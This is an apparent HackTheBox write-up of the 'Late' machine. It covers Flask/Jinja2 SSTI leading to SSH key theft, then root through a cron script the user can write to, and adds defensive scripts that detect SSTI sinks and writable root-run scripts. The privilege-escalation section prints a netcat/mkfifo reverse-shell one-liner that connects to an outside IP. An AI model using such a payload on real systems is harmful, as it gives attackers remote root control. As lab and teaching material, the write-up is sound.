Machine Info
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 23 Apr 2022
- IP: 10.10.11.156
Network Scanning
We have only two open ports: http (80) and ssh (22).
nmap -p- -A 10.10.11.156
Enumeration
While checking the webpage, we notice the domain “late.htb” and the sub-domain “images.late.htb”. Add both to the /etc/hosts file.
gedit /etc/hosts
10.10.11.156 late.htb images.late.htb
Nothing interesting at “late.htb”. At “images.late.htb”, we have a webpage with an upload feature implemented with the Flask framework.
Since this web app uses Flask, it may be vulnerable to Server Side Template Injection (SSTI). Testing for SSTI, we identified that “jinja2” is used as the template engine and that it is vulnerable to SSTI.
To convert text to an image, the website cloudconvert is helpful.
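The weakness above comes from handing user-controlled text to Jinja2 as the template source rather than as template data. As an added example (not from the original writeup, and not the box's application code), the following shell script greps a Flask code base for that pattern, render_template_string() called with an f-string or a variable as its first argument, and contrasts it with the safe form that passes the input as a context variable. The regex is a heuristic and the two sample files are constructed for the demo.

```shell
#!/bin/sh
# Added example: static check for the Flask SSTI sink pattern.
# Not from the original writeup; regex and sample files are assumptions.

# Flag render_template_string( calls whose first argument is an f-string
# or a bare identifier, i.e. a template assembled at runtime rather than a
# plain string literal. Tune the pattern for your own code base.
SSTI_SINK_PATTERN="render_template_string\( *(f[\"']|[A-Za-z_])"

# Usage: scan_ssti_sinks <source-dir>
# Prints file:line:code for each suspect call; exit 0 if any were found.
scan_ssti_sinks() {
    # /dev/null forces grep to print the file name even for a single hit
    find "$1" -name '*.py' -exec grep -nE "$SSTI_SINK_PATTERN" /dev/null {} +
}

# Constructed sample tree so the check runs offline.
make_sample_tree() {
    dir=$(mktemp -d)
    cat > "$dir/vulnerable.py" <<'EOF'
from flask import request, render_template_string
def hello():
    name = request.args.get("name", "")
    return render_template_string(f"Hello {name}")  # input becomes template code
EOF
    cat > "$dir/safe.py" <<'EOF'
from flask import request, render_template_string
def hello():
    name = request.args.get("name", "")
    return render_template_string("Hello {{ name }}", name=name)  # input is data
EOF
    printf '%s\n' "$dir"
}

SAMPLE_DIR=$(make_sample_tree)
scan_ssti_sinks "$SAMPLE_DIR"
```

The check only reports the obvious shapes; a literal later combined with `%` or `.format()` slips past it, so treat a clean run as a starting point for review, not proof of absence. The fix in every case is the same: keep the template static and pass request data in as variables, which Jinja2 then escapes and never evaluates.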
Exploitation
Now it is time to exploit. This article explains how to escalate SSTI to RCE in Flask/Jinja2.
There is an “svc_acc” user; let’s get its SSH private key and log in.
Here is the user flag.
Privilege Escalation
Using “linpeas” and “pspy64”, we notice a script called “ssh-alert.sh” to which we have write permission. The script is owned by root and run periodically by cron. It sends an alert to root whenever an SSH login occurs.
Since we have write permission on that script, we can append a malicious payload to get a reverse shell as root.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 9999 >/tmp/f' >> ssh-alert.sh; ssh localhost "exit"
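The root cause of this escalation is a script executed as root that a lower-privileged account can modify. As an added example (not from the original writeup, and not the box's own tooling), the following shell script audits a list of script paths for exactly that condition: an owner other than the expected one, or a group/world write bit. The expected owner is a parameter so the demo can run as whatever user executes it; on a real host you would pass root and feed it the paths referenced from cron. The sample files and their permissions are constructed.

```shell
#!/bin/sh
# Added example: audit root-run scripts for write access by other users.
# Not from the original writeup; sample files and names are constructed.

# Usage: audit_writable_scripts <expected-owner> <script>...
# Prints "<perms> <path>: <reasons>" for each risky script.
# Returns 0 when everything is clean, 1 when at least one script is risky.
audit_writable_scripts() {
    expected_owner=$1; shift
    found=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        line=$(ls -ld "$f")
        perm=${line%% *}                               # e.g. -rwxrw-r--
        owner=$(printf '%s\n' "$line" | awk '{print $3}')
        reason=""
        [ "$owner" = "$expected_owner" ] || reason=" owner=$owner"
        case $perm in ?????w*) reason="$reason group-writable";; esac   # char 6
        case $perm in ????????w*) reason="$reason world-writable";; esac # char 9
        if [ -n "$reason" ]; then
            printf '%s %s:%s\n' "$perm" "$f" "$reason"
            found=1
        fi
    done
    return $found
}

# Helper for real hosts: pull script paths out of the system crontabs.
# Reads /etc/crontab and /etc/cron.d/*; silent if they do not exist.
cron_script_paths() {
    grep -hEo '/[^[:space:]]+\.sh' /etc/crontab /etc/cron.d/* 2>/dev/null | sort -u
}

# Constructed demo: one group-writable alert script, one properly locked down.
SAMPLE_DIR=$(mktemp -d)
printf '#!/bin/sh\necho alert\n' > "$SAMPLE_DIR/ssh-alert.sh"
chmod 664 "$SAMPLE_DIR/ssh-alert.sh"
printf '#!/bin/sh\necho ok\n' > "$SAMPLE_DIR/backup.sh"
chmod 755 "$SAMPLE_DIR/backup.sh"

audit_writable_scripts "$(id -un)" "$SAMPLE_DIR"/*.sh \
    || echo "one or more scripts are modifiable by other users"
```

On a live system the two pieces combine as `audit_writable_scripts root $(cron_script_paths)`; anything reported should be reset to root ownership and mode 755 or stricter, and the same question should be asked of every directory on the script's path, since a writable parent directory lets the file be replaced outright.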